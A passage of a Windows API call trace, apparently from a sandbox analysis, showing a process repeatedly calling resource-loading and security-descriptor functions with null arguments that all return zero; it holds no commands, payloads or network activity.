(hResData=0x0) returned 0 [0220.045] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.045] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.045] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource (hResData=0x0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.045] FreeResource (hResData=0x0) returned 0 [0220.045] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.045] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.045] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.045] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.045] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.045] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.046] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.046] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.046] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.046] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.046] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.046] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.046] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.046] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.046] LockResource (hResData=0x0) returned 0x0 [0220.046] FreeResource (hResData=0x0) returned 0 [0220.047] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.047] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.047] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.047] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.047] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.047] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.047] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.047] LockResource (hResData=0x0) returned 0x0 [0220.047] FreeResource (hResData=0x0) returned 0 [0220.047] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.047] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.047] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.047] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.047] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.048] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.048] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.048] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.048] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.048] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.048] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.048] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.048] LockResource (hResData=0x0) returned 0x0 [0220.048] FreeResource (hResData=0x0) returned 0 [0220.048] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.049] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.049] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.049] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.049] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.049] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.049] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.049] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.049] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.049] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.049] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.049] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.049] LockResource (hResData=0x0) returned 0x0 [0220.049] FreeResource (hResData=0x0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.050] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.050] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.050] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.050] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.050] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.050] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.050] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.050] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.050] LockResource (hResData=0x0) returned 0x0 [0220.050] FreeResource (hResData=0x0) returned 0 [0220.051] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.051] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.051] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.051] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.051] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.051] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.051] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.051] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.051] LockResource (hResData=0x0) returned 0x0 [0220.051] FreeResource (hResData=0x0) returned 0 [0220.051] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.051] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.051] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.052] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.052] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.052] LockResource (hResData=0x0) returned 0x0 [0220.052] FreeResource (hResData=0x0) returned 0 [0220.052] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.083] LockResource (hResData=0x0) returned 0x0 [0220.083] FreeResource (hResData=0x0) returned 0 [0220.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.083] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.083] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.083] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.083] LockResource (hResData=0x0) returned 0x0 [0220.083] FreeResource (hResData=0x0) returned 0 [0220.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.083] LockResource (hResData=0x0) returned 0x0 [0220.083] FreeResource (hResData=0x0) returned 0 [0220.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: 